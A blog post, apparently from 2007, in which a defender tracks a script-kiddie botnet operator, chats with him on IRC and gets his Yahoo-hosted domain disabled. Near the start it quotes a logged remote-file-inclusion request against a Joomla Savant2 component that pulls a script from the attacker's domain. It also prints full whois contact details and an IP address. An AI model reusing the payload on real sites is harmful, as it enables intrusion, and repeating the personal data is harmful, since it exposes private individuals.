B10[mg]

As mentioned before I've been obsessed with stopping botnets. Well, this one, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
  Creation Date........ 2007-01-23
  Registration Date.... 2007-01-23
  Expiry Date.......... 2008-01-23
  Organisation Name.... Stanley Livingston
  Organisation Address. 455 Rose Quartz Place
  Organisation Address. 
  Organisation Address. Castle Rock
  Organisation Address. 80108
  Organisation Address. CO
  Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
  Admin Address........ 455 Rose Quartz Place
  Admin Address........ 
  Admin Address........ Castle Rock
  Admin Address........ 80108
  Admin Address........ CO
  Admin Address........ UNITED STATES
  Admin Email.......... fazanul5004@yahoo.com
  Admin Phone.......... +1.9094813680
  Admin Fax............ 

Tech Name............ YahooDomains TechContact
  Tech Address......... 701 First Ave.
  Tech Address......... 
  Tech Address......... Sunnyvale
  Tech Address......... 94089
  Tech Address......... CA
  Tech Address......... UNITED STATES
  Tech Email........... domain.tech@YAHOO-INC.COM
  Tech Phone........... +1.6198813096
  Tech Fax............. 
  Name Server.......... yns1.yahoo.com
  Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's login, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the red comments are added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged in the IRC channel, from this machine (mail.b10m.net). 
He was clever enough to look that up. Unfortunately for him, 
the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) 
Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed me out to a typo. That IP address *used* to be my 
IP address. Nowadays I have 217.19.21.103...

<Sorin> Ah yes ... oh well, I talk to you later then
<fazanul> to believe
<Sorin> You're too smart for me
<fazanul> :))))))))

SignOff: Sorin (fazanul ... the ultimate script kiddie)

Let's see how long this new botnet will last ... and let's see when I will meet my buddy fazaNULL again :-)

Update (2007/01/24): poor, poor fazanul. After receiving a canned reply from Yahoo abuse, in which they really shared my pain of receiving spam, but the message really didn't originate at a Yahoo mail server (what message again?), they did act on this domain:

$ HEAD http://fazanul.com/c.txt
503 Service Temporarily Unavailable
[...]
X-Host: p10w8.geo.mud.yahoo.com
X-INKT-SITE: http://us.geocities.com/server-errors
X-INKT-URI: http://us.geocities.com/server-errors/pd_disabled.html

And sure enough, http://fazanul.com/ is pretty obvious:

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Mission accomplished ... again ;-)

fazanul, botnet, script kiddie